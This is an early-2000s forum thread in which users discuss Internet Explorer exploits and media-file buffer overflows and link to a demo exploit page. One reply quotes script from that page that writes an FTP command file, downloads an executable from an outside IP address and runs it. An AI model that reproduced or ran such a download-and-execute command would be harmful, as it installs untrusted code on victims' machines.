Author Topic: yet another exploit  (Read 1244 times)

anphanax

  • Member
  • **
  • Posts: 197
  • Kudos: 11
    • http://june.tripod.com
yet another exploit
« on: 29 December 2002, 10:04 »
http://unsecured.netfirms.com/exploit.jpg

this doesn't work with Mozilla or Netscape
But it sure as hell does with MSIE

Edit: Isn't it amazing how MSIE will just let you
use any extension for HTML files. I wander if
this little bug has some my computer zone
privledges. That would be funny and devestating
if someone played around with VBScript in this
way.

As a side not, similar to MS, of course America
Online has yet another problem, this one
involving punters:
www.xeons.net (sad, but as form of proof)

New Edit:
http://www.zeropaid.com/news/articles/auto/12182002g.php
apparently windows users also get to deal with
buffer overflow errors regarding "oversized"
mp3s and wmv files. I noticed their PNG thing
as well, and I have seen how MSIE doesn't always
handle them properly anyways, but THIS IS
PATHETIC.. And now windows xp users must wait
until MS patches this. (If they haven't already)
Note article dating: December 18, 2002, 5:12 PM PT

[ December 29, 2002: Message edited by: anphanax ]


Calum

  • Global Moderator
  • Member
  • ***
  • Posts: 7,812
  • Kudos: 1000
    • Calum Carlyle's music
yet another exploit
« Reply #1 on: 4 January 2003, 06:44 »
article from pcgames.de

Not quite so bad, just another article about microsoft's swiss cheese shaped software.

[ January 03, 2003: Message edited by: Calum ]

[ January 04, 2003: Message edited by: Calum ]

visit these websites and make yourself happy forever:
It's my music! | My music on MySpace | Integrational Polytheism

Gooseberry Clock

  • Member
  • **
  • Posts: 419
  • Kudos: 0
    • http://redrangersoftware.cjb.net/
yet another exploit
« Reply #2 on: 4 January 2003, 20:16 »
Let's see how long it takes them to bust this guy.

Calum

  • Global Moderator
  • Member
  • ***
  • Posts: 7,812
  • Kudos: 1000
    • Calum Carlyle's music
yet another exploit
« Reply #3 on: 4 January 2003, 23:09 »
what guy, fuckass?
visit these websites and make yourself happy forever:
It's my music! | My music on MySpace | Integrational Polytheism

Gooseberry Clock

  • Member
  • **
  • Posts: 419
  • Kudos: 0
    • http://redrangersoftware.cjb.net/
yet another exploit
« Reply #4 on: 8 January 2003, 23:20 »
quote:
args = '/c echo o 141.156.185.80> c:/windows/ftp.txt & '+
 'echo user anonymous>> c:/windows/ftp.txt & '+
 'echo anonymous@anonymous>> c:/windows/ftp.txt & '+
 'echo get /fun.exe c:/windows/taskdl.exe>> c:/windows/ftp.txt & '+
 'echo quit>> c:/windows/ftp.txt & '+
 'ftp -i -n -v -s:c:/windows/ftp.txt & '+
 'c:/windows/taskdl.exe';
His IP is clearly visible in the unescaped code.

Calum

  • Global Moderator
  • Member
  • ***
  • Posts: 7,812
  • Kudos: 1000
    • Calum Carlyle's music
yet another exploit
« Reply #5 on: 9 January 2003, 14:20 »
oh okay, didn't realise who you were talking about...
visit these websites and make yourself happy forever:
It's my music! | My music on MySpace | Integrational Polytheism